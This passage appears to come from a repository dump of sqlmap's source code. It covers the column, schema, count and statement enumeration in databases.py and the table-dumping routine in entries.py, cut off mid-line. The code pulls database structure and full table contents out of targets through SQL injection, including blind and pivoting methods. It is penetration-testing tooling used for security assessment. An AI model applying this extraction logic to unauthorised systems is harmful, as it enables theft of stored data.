isNoneValue(value) or value == \" \":\n                                    break\n                                else:\n                                    columns[safeSQLIdentificatorNaming(value)] = None\n                                    index += 1\n\n                        if not columns:\n                            errMsg = \"unable to retrieve the %scolumns \" % (\"number of \" if not Backend.isDbms(DBMS.MSSQL) else \"\")\n                            errMsg += \"for table '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n                            if METADB_SUFFIX not in conf.db:\n                                errMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                            logger.error(errMsg)\n                            continue\n\n                for index in getLimitRange(count):\n                    if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):\n                        query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))\n                        query += condQuery\n                        field = None\n                    elif Backend.isDbms(DBMS.H2):\n                        query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))\n                        query = query.replace(\" ORDER BY \", \"%s ORDER BY \" % condQuery)\n                        field = None\n                    elif Backend.isDbms(DBMS.MIMERSQL):\n                        query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))\n                        query = query.replace(\" ORDER BY \", \"%s ORDER BY \" % condQuery)\n                        field = None\n                    elif Backend.isDbms(DBMS.MONETDB):\n                        query = safeStringFormat(rootQuery.blind.query, (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), index))\n                        field = None\n                    elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE):\n                        query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))\n                        query += condQuery\n                        field = None\n                    elif Backend.isDbms(DBMS.MSSQL):\n                        query = rootQuery.blind.query.replace(\"'%s'\", \"'%s'\" % unsafeSQLIdentificatorNaming(tbl).split(\".\")[-1]).replace(\"%s\", conf.db).replace(\"%d\", str(index))\n                        query += condQuery.replace(\"[DB]\", conf.db)\n                        field = condition.replace(\"[DB]\", conf.db)\n                    elif Backend.isDbms(DBMS.FIREBIRD):\n                        query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl)\n                        query += condQuery\n                        field = None\n                    elif Backend.isDbms(DBMS.INFORMIX):\n                        query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))\n                        query += condQuery\n                        field = condition\n\n                    query = agent.limitQuery(index, query, field, field)\n                    column = unArrayizeValue(inject.getValue(query, union=False, error=False))\n\n                    if not isNoneValue(column):\n                        if conf.getComments:\n                            _ = queries[Backend.getIdentifiedDbms()].column_comment\n                            if hasattr(_, \"query\"):\n                                if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                                    query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper()))\n                                else:\n                                    query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column))\n\n                                comment = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                                if not isNoneValue(comment):\n                                    infoMsg = \"retrieved comment '%s' for column '%s'\" % (comment, column)\n                                    logger.info(infoMsg)\n                            else:\n                                warnMsg = \"on %s it is not \" % Backend.getIdentifiedDbms()\n                                warnMsg += \"possible to get column comments\"\n                                singleTimeWarnMessage(warnMsg)\n\n                        if not onlyColNames:\n                            if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):\n                                query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))\n                            elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):\n                                query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))\n                            elif Backend.isDbms(DBMS.MSSQL):\n                                query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(\".\")[-1])\n                            elif Backend.isDbms(DBMS.FIREBIRD):\n                                query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column)\n                            elif Backend.isDbms(DBMS.INFORMIX):\n                                query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl), column)\n                            elif Backend.isDbms(DBMS.MONETDB):\n                                query = rootQuery.blind.query2 % (column, unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))\n\n                            colType = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                            key = int(colType) if hasattr(colType, \"isdigit\") and colType.isdigit() else colType\n\n                            if Backend.isDbms(DBMS.FIREBIRD):\n                                colType = FIREBIRD_TYPES.get(key, colType)\n                            elif Backend.isDbms(DBMS.INFORMIX):\n                                notNull = False\n                                if isinstance(key, int) and key > 255:\n                                    key -= 256\n                                    notNull = True\n                                colType = INFORMIX_TYPES.get(key, colType)\n                                if notNull:\n                                    colType = \"%s NOT NULL\" % colType\n\n                            column = safeSQLIdentificatorNaming(column)\n                            columns[column] = colType\n                        else:\n                            column = safeSQLIdentificatorNaming(column)\n                            columns[column] = None\n\n                if columns:\n                    if conf.db in kb.data.cachedColumns:\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns\n                    else:\n                        table[safeSQLIdentificatorNaming(tbl, True)] = columns\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table\n\n        if not kb.data.cachedColumns:\n            warnMsg = \"unable to retrieve column names for \"\n            warnMsg += (\"table '%s' \" % unsafeSQLIdentificatorNaming(unArrayizeValue(tblList))) if len(tblList) == 1 else \"any table \"\n            if METADB_SUFFIX not in conf.db:\n                warnMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n            logger.warning(warnMsg)\n\n            if bruteForce is None:\n                return self.getColumns(onlyColNames=onlyColNames, colTuple=colTuple, bruteForce=True)\n\n        return kb.data.cachedColumns\n\n    @stackedmethod\n    def getSchema(self):\n        infoMsg = \"enumerating database management system schema\"\n        logger.info(infoMsg)\n\n        try:\n            pushValue(conf.db)\n            pushValue(conf.tbl)\n            pushValue(conf.col)\n\n            kb.data.cachedTables = {}\n            kb.data.cachedColumns = {}\n\n            self.getTables()\n\n            infoMsg = \"fetched tables: \"\n            infoMsg += \", \".join([\"%s\" % \", \".join(\"'%s%s%s'\" % (unsafeSQLIdentificatorNaming(db), \"..\" if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) for _ in tbl) for db, tbl in kb.data.cachedTables.items()])\n            logger.info(infoMsg)\n\n            for db, tables in kb.data.cachedTables.items():\n                for tbl in tables:\n                    conf.db = db\n                    conf.tbl = tbl\n\n                    self.getColumns()\n        finally:\n            conf.col = popValue()\n            conf.tbl = popValue()\n            conf.db = popValue()\n\n        return kb.data.cachedColumns\n\n    def _tableGetCount(self, db, table):\n        if not db or not table:\n            return None\n\n        if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n            db = db.upper()\n            table = table.upper()\n\n        if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB):\n            query = \"SELECT %s FROM %s\" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(table, True))\n        else:\n            query = \"SELECT %s FROM %s.%s\" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True))\n\n        query = agent.whereQuery(query)\n        count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n        if isNumPosStrValue(count):\n            if safeSQLIdentificatorNaming(db) not in kb.data.cachedCounts:\n                kb.data.cachedCounts[safeSQLIdentificatorNaming(db)] = {}\n\n            if int(count) in kb.data.cachedCounts[safeSQLIdentificatorNaming(db)]:\n                kb.data.cachedCounts[safeSQLIdentificatorNaming(db)][int(count)].append(safeSQLIdentificatorNaming(table, True))\n            else:\n                kb.data.cachedCounts[safeSQLIdentificatorNaming(db)][int(count)] = [safeSQLIdentificatorNaming(table, True)]\n\n    def getCount(self):\n        if not conf.tbl:\n            warnMsg = \"missing table parameter, sqlmap will retrieve \"\n            warnMsg += \"the number of entries for all database \"\n            warnMsg += \"management system databases' tables\"\n            logger.warning(warnMsg)\n\n        elif \".\" in conf.tbl:\n            if not conf.db:\n                conf.db, conf.tbl = conf.tbl.split('.', 1)\n\n        if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB):\n            warnMsg = \"missing database parameter. sqlmap is going to \"\n            warnMsg += \"use the current database to retrieve the \"\n            warnMsg += \"number of entries for table '%s'\" % unsafeSQLIdentificatorNaming(conf.tbl)\n            logger.warning(warnMsg)\n\n            conf.db = self.getCurrentDb()\n\n        self.forceDbmsEnum()\n\n        if conf.tbl:\n            for table in conf.tbl.split(','):\n                self._tableGetCount(conf.db, table)\n        else:\n            self.getTables()\n\n            for db, tables in kb.data.cachedTables.items():\n                for table in tables:\n                    self._tableGetCount(db, table)\n\n        return kb.data.cachedCounts\n\n    def getStatements(self):\n        infoMsg = \"fetching SQL statements\"\n        logger.info(infoMsg)\n\n        rootQuery = queries[Backend.getIdentifiedDbms()].statements\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):\n                query = rootQuery.inband.query2\n            else:\n                query = rootQuery.inband.query\n\n            while True:\n                values = inject.getValue(query, blind=False, time=False)\n\n                if not isNoneValue(values):\n                    kb.data.cachedStatements = []\n                    for value in arrayizeValue(values):\n                        value = (unArrayizeValue(value) or \"\").strip()\n                        if not isNoneValue(value):\n                            kb.data.cachedStatements.append(value.strip())\n\n                elif Backend.isDbms(DBMS.PGSQL) and \"current_query\" not in query:\n                    query = query.replace(\"query\", \"current_query\")\n                    continue\n\n                break\n\n        if not kb.data.cachedStatements and isInferenceAvailable() and not conf.direct:\n            infoMsg = \"fetching number of statements\"\n            logger.info(infoMsg)\n\n            query = rootQuery.blind.count\n\n            if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):\n                query = re.sub(\"INFORMATION_SCHEMA\", \"DATA_DICTIONARY\", query, flags=re.I)\n\n            count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n            if count == 0:\n                return kb.data.cachedStatements\n            elif not isNumPosStrValue(count):\n                errMsg = \"unable to retrieve the number of statements\"\n                raise SqlmapNoneDataException(errMsg)\n\n            plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES\n            indexRange = getLimitRange(count, plusOne=plusOne)\n\n            for index in indexRange:\n                value = None\n\n                if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):  # case with multiple processes\n                    query = rootQuery.blind.query3 % index\n                    identifier = unArrayizeValue(inject.getValue(query, union=False, error=False, expected=EXPECTED.INT))\n\n                    if not isNoneValue(identifier):\n                        query = rootQuery.blind.query2 % identifier\n                        value = unArrayizeValue(inject.getValue(query, union=False, error=False, expected=EXPECTED.INT))\n\n                if isNoneValue(value):\n                    query = rootQuery.blind.query % index\n\n                    if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):\n                        query = re.sub(\"INFORMATION_SCHEMA\", \"DATA_DICTIONARY\", query, flags=re.I)\n\n                    value = unArrayizeValue(inject.getValue(query, union=False, error=False))\n\n                if not isNoneValue(value):\n                    kb.data.cachedStatements.append(value)\n\n        if not kb.data.cachedStatements:\n            errMsg = \"unable to retrieve the statements\"\n            logger.error(errMsg)\n        else:\n            kb.data.cachedStatements = [_.replace(REFLECTED_VALUE_MARKER, \"<payload>\") for _ in kb.data.cachedStatements]\n\n        return kb.data.cachedStatements\n"
  },
  {
    "path": "sqlmap/plugins/generic/entries.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.agent import agent\nfrom lib.core.bigarray import BigArray\nfrom lib.core.common import Backend\nfrom lib.core.common import clearConsoleLine\nfrom lib.core.common import getLimitRange\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import isInferenceAvailable\nfrom lib.core.common import isListLike\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import prioritySortColumns\nfrom lib.core.common import readInput\nfrom lib.core.common import safeSQLIdentificatorNaming\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.convert import getConsoleLength\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.dicts import DUMP_REPLACEMENTS\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD\nfrom lib.core.settings import CURRENT_DB\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.core.settings import NULL\nfrom lib.core.settings import PLUS_ONE_DBMSES\nfrom lib.core.settings import UPPER_CASE_DBMSES\nfrom lib.request import inject\nfrom lib.utils.hash import attackDumpedTable\nfrom lib.utils.pivotdumptable import pivotDumpTable\nfrom thirdparty import six\nfrom thirdparty.six.moves import zip as _zip\n\nclass Entries(object):\n    \"\"\"\n    This class defines entries' enumeration functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    def dumpTable(self, foundData=None):\n        self.forceDbmsEnum()\n\n        if conf.db is None or conf.db == CURRENT_DB:\n            if conf.db is None:\n                warnMsg = \"missing database parameter. sqlmap is going \"\n                warnMsg += \"to use the current database to enumerate \"\n                warnMsg += \"table(s) entries\"\n                logger.warning(warnMsg)\n\n            conf.db = self.getCurrentDb()\n\n        elif conf.db is not None:\n            if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                conf.db = conf.db.upper()\n\n            if ',' in conf.db:\n                errMsg = \"only one database name is allowed when enumerating \"\n                errMsg += \"the tables' columns\"\n                raise SqlmapMissingMandatoryOptionException(errMsg)\n\n            if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None:\n                infoMsg = \"skipping database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                singleTimeLogMessage(infoMsg)\n                return\n\n        conf.db = safeSQLIdentificatorNaming(conf.db) or \"\"\n\n        if conf.tbl:\n            if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                conf.tbl = conf.tbl.upper()\n\n            tblList = conf.tbl.split(',')\n        else:\n            self.getTables()\n\n            if len(kb.data.cachedTables) > 0:\n                tblList = list(six.itervalues(kb.data.cachedTables))\n\n                if tblList and isListLike(tblList[0]):\n                    tblList = tblList[0]\n            elif conf.db and not conf.search:\n                errMsg = \"unable to retrieve the tables \"\n                errMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                raise SqlmapNoneDataException(errMsg)\n            else:\n                return\n\n        for tbl in tblList:\n            tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)\n\n        for tbl in tblList:\n            if kb.dumpKeyboardInterrupt:\n                break\n\n            if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None:\n                infoMsg = \"skipping table '%s'\" % unsafeSQLIdentificatorNaming(tbl)\n                singleTimeLogMessage(infoMsg)\n                continue\n\n            conf.tbl = tbl\n            kb.data.dumpedTable = {}\n\n            if foundData is None:\n                kb.data.cachedColumns = {}\n                self.getColumns(onlyColNames=True, dumpMode=True)\n            else:\n                kb.data.cachedColumns = foundData\n\n            try:\n                if Backend.isDbms(DBMS.INFORMIX):\n                    kb.dumpTable = \"%s:%s\" % (conf.db, tbl)\n                elif Backend.isDbms(DBMS.SQLITE):\n                    kb.dumpTable = tbl\n                else:\n                    kb.dumpTable = \"%s.%s\" % (conf.db, tbl)\n\n                if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:\n                    warnMsg = \"unable to enumerate the columns for table '%s'\" % unsafeSQLIdentificatorNaming(tbl)\n                    if METADB_SUFFIX not in conf.db:\n                        warnMsg += \" in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                    warnMsg += \", skipping\" if len(tblList) > 1 else \"\"\n                    logger.warning(warnMsg)\n\n                    continue\n\n                columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]\n                colList = sorted(column for column in columns if column)\n\n                if conf.exclude:\n                    colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]\n\n                if not colList:\n                    warnMsg = \"skipping table '%s'\" % unsafeSQLIdentificatorNaming(tbl)\n                    if METADB_SUFFIX not in conf.db:\n                        warnMsg += \" in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                    warnMsg += \" (no usable column names)\"\n                    logger.warning(warnMsg)\n                    continue\n\n                kb.dumpColumns = [unsafeSQLIdentificatorNaming(_) for _ in colList]\n                colNames = colString = ','.join(column for column in colList)\n                rootQuery = queries[Backend.getIdentifiedDbms()].dump_table\n\n                infoMsg = \"fetching entries\"\n                if conf.col:\n                    infoMsg += \" of column(s) '%s'\" % colNames\n                infoMsg += \" for table '%s'\" % unsafeSQLIdentificatorNaming(tbl)\n                if METADB_SUFFIX not in conf.db:\n                    infoMsg += \" in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                logger.info(infoMsg)\n\n                for column in colList:\n                    _ = agent.preprocessField(tbl, column)\n                    if _ != column:\n                        colString = re.sub(r\"\\b%s\\b\" % re.escape(column), _.replace(\"\\\\\", r\"\\\\\"), colString)\n\n                entriesCount = 0\n\n                if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n                    entries = []\n                    query = None\n\n                    if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):\n                        query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else (\"%s.%s\" % (conf.db.upper(), tbl.upper())))\n                    elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):\n                        query = rootQuery.inband.query % (colString, tbl)\n                    elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):\n                        # Partial inband and error\n                        if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):\n                            table = \"%s.%s\" % (conf.db, tbl) if conf.db else tbl\n\n                            if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting:\n                                warnMsg = \"in case of table dumping problems (e.g. column entry order) \"\n                                warnMsg += \"you are advised to rerun with '--force-pivoting'\"\n                                singleTimeWarnMessage(warnMsg)\n\n                                query = rootQuery.blind.count % table\n                                query = agent.whereQuery(query)\n\n                                count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n                                if isNumPosStrValue(count):\n                                    try:\n                                        indexRange = getLimitRange(count, plusOne=True)\n\n                                        for index in indexRange:\n                                            row = []\n                                            for column in colList:\n                                                query = rootQuery.blind.query3 % (column, column, table, index)\n                                                query = agent.whereQuery(query)\n                                                value = inject.getValue(query, blind=False, time=False, dump=True) or \"\"\n                                                row.append(value)\n\n                                            if not entries and isNoneValue(row):\n                                                break\n\n                                            entries.append(row)\n\n                                    except KeyboardInterrupt:\n                                        kb.dumpKeyboardInterrupt = True\n                                        clearConsoleLine()\n                                        warnMsg = \"Ctrl+C detected in dumping phase\"\n                                        logger.warning(warnMsg)\n\n                            if isNoneValue(entries) and not kb.dumpKeyboardInterrupt:\n                                try:\n                                    retVal = pivotDumpTable(table, colList, blind=False)\n                                except KeyboardInterrupt:\n                                    retVal = None\n                                    kb.dumpKeyboardInterrupt = True\n                                    clearConsoleLine()\n                                    warnMsg = \"Ctrl+C detected in dumping phase\"\n                                    logger.warning(warnMsg)\n\n                                if retVal:\n                                    entries, _ = retVal\n                                    entries = BigArray(_zip(*[entries[colName] for colName in colList]))\n                        else:\n                            query = rootQuery.inband.query % (colString, conf.db, tbl)\n                    elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO):\n                        query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])\n                    else:\n                        query = rootQuery.inband.query % (colString, conf.db, tbl)\n\n                    query = agent.whereQuery(query)\n\n                    if not entries and query and not kb.dumpKeyboardInterrupt:\n                        try:\n                            entries = inject.getValue(query, blind=False, time=False, dump=True)\n                        except KeyboardInterrupt:\n                            entries = None\n                            kb.dumpKeyboardInterrupt = True\n                            clearConsoleLine()\n                            warnMsg = \"Ctrl+C detected in dumping phase\"\n                            logger.warning(warnMsg)\n\n                    if not isNoneValue(entries):\n                        if isinstance(entries, six.string_types):\n                            entries = [entries]\n                        elif not isListLike(entries):\n                            entries = []\n\n                        entriesCount = len(entries)\n\n                        for index, column in enumerate(colList):\n                            if column not in kb.data.dumpedTable:\n                                kb.data.dumpedTable[column] = {\"length\": len(column), \"values\": BigArray()}\n\n                            for entry in entries:\n                                if entry is None or len(entry) == 0:\n                                    continue\n\n                                if isinstance(entry, six.string_types):\n                                    colEntry = entry\n                                else:\n                                    colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u''\n\n                                maxLen = max(getConsoleLength(column), getConsoleLength(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))))\n\n                                if maxLen > kb.data.dumpedTable[column][\"length\"]:\n                                    kb.data.dumpedTable[column][\"length\"] = maxLen\n\n                                kb.data.dumpedTable[column][\"values\"].append(colEntry)\n\n                if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct:\n                    infoMsg = \"fetching number of \"\n                    if conf.col:\n                        infoMsg += \"column(s) '%s' \" % colNames\n                    infoMsg += \"entries for table '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n                    infoMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                    logger.info(infoMsg)\n\n                    if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):\n                        query = rootQuery.blind.count % (tbl.upper() if not conf.db else (\"%s.%s\" % (conf.db.upper(), tbl.upper())))\n                    elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.MAXDB, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):\n                        query = rootQuery.blind.count % tbl\n                    elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):\n                        query = rootQuery.blind.count % (\"%s.%s\" % (conf.db, tbl)) if conf.db else tbl\n                    elif Backend.isDbms(DBMS.INFORMIX):\n                        query = rootQuery.blind.count % (conf.db, tbl)\n                    else:\n                        query = rootQuery.blind.count % (conf.db, tbl)\n\n                    query = agent.whereQuery(query)\n\n                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                    lengths = {}\n                    entries = {}\n\n                    if count == 0:\n                        warnMsg = \"table '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n                        warnMsg += \"in database '%s' \" % unsafeSQLIdentificatorNaming(conf.db)\n                        warnMsg += \"appears to be empty\"\n                        logger.warning(warnMsg)\n\n                        for column in colList:\n                            lengths[column] = len(column)\n                            entries[column] = []\n\n                    elif not isNumPosStrValue(count):\n                        warnMsg = \"unable to retrieve the number of \"\n                        if conf.col:\n                            warnMsg += \"column(s) '%s' \" % colNames\n                        warnMsg += \"entries for table '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n                        warnMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                        logger.warning(warnMsg)\n\n                        continue\n\n                    elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI, DBMS.RAIMA):\n                        if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.RAIMA):\n                            table = tbl\n                        elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL, DBMS.MAXDB):\n                            table = \"%s.%s\" % (conf.db, tbl) if conf.db else tbl\n                        elif Backend.isDbms(DBMS.INFORMIX):\n                            table = \"%s:%s\" % (conf.db, tbl) if conf.db else tbl\n\n                        if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting:\n                            warnMsg = \"in case of table dumping problems (e.g. column entry order) \"\n                            warnMsg += \"you are advised to rerun with '--force-pivoting'\"\n                            singleTimeWarnMessage(warnMsg)\n\n                            try:\n                                indexRange = getLimitRange(count, plusOne=True)\n\n                                for index in indexRange:\n                                    for column in colList:\n                                        query = rootQuery.blind.query3 % (column, column, table, index)\n                                        query = agent.whereQuery(query)\n\n                                        value = inject.getValue(query, union=False, error=False, dump=True) or \"\"\n\n                                        if column not in lengths:\n                                            lengths[column] = 0\n\n                                        if column not in entries:\n                                            entries[column] = BigArray()\n\n                                        lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))\n                                        entries[column].append(value)\n\n                            except KeyboardInterrupt:\n                                kb.dumpKeyboardInterrupt = True\n                                clearConsoleLine()\n                                warnMsg = \"Ctrl+C detected in dumping phase\"\n                                logger.warning(warnMsg)\n\n                        if not entries and not kb.dumpKeyboardInterrupt:\n                            try:\n                                retVal = pivotDumpTable(table, colList, count, blind=True)\n                            except KeyboardInterrupt:\n                                retVal = None\n                                kb.dumpKeyboardInterrupt = True\n                                clearConsoleLine()\n                                warnMsg = \"Ctrl+C detected in dumping phase\"\n                                logger.warning(warnMsg)\n\n                            if retVal:\n                                entries, lengths = retVal\n\n                    else:\n                        emptyColumns = []\n                        plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES\n                        indexRange = getLimitRange(count, plusOne=plusOne)\n\n                        if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:\n                            debugMsg = \"checking for empty columns\"\n                            logger.debug(infoMsg)\n\n                            for column in colList:\n                                if not inject.checkBooleanExpression(\"(SELECT COUNT(%s) FROM %s)>0\" % (column, kb.dumpTable)):\n                                    emptyColumns.append(column)\n                                    debugMsg = \"column '%s' of table '%s' will not be \" % (column, kb.dumpTable)\n                                    debugMsg += \"dumped as it appears to be empty\"\n                                    logger.debug(debugMsg)\n\n                        try:\n                            for index in indexRange:\n                                for column in colList:\n                                    value = \"\"\n\n                                    if column not in lengths:\n                                        lengths[column] = 0\n\n                                    if column not in entries:\n                                        entries[column] = BigArray()\n\n                                    if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE):\n                                        query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)\n                                    elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):\n                                        query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else (\"%s.%s\" % (conf.db.upper(), tbl.upper())), 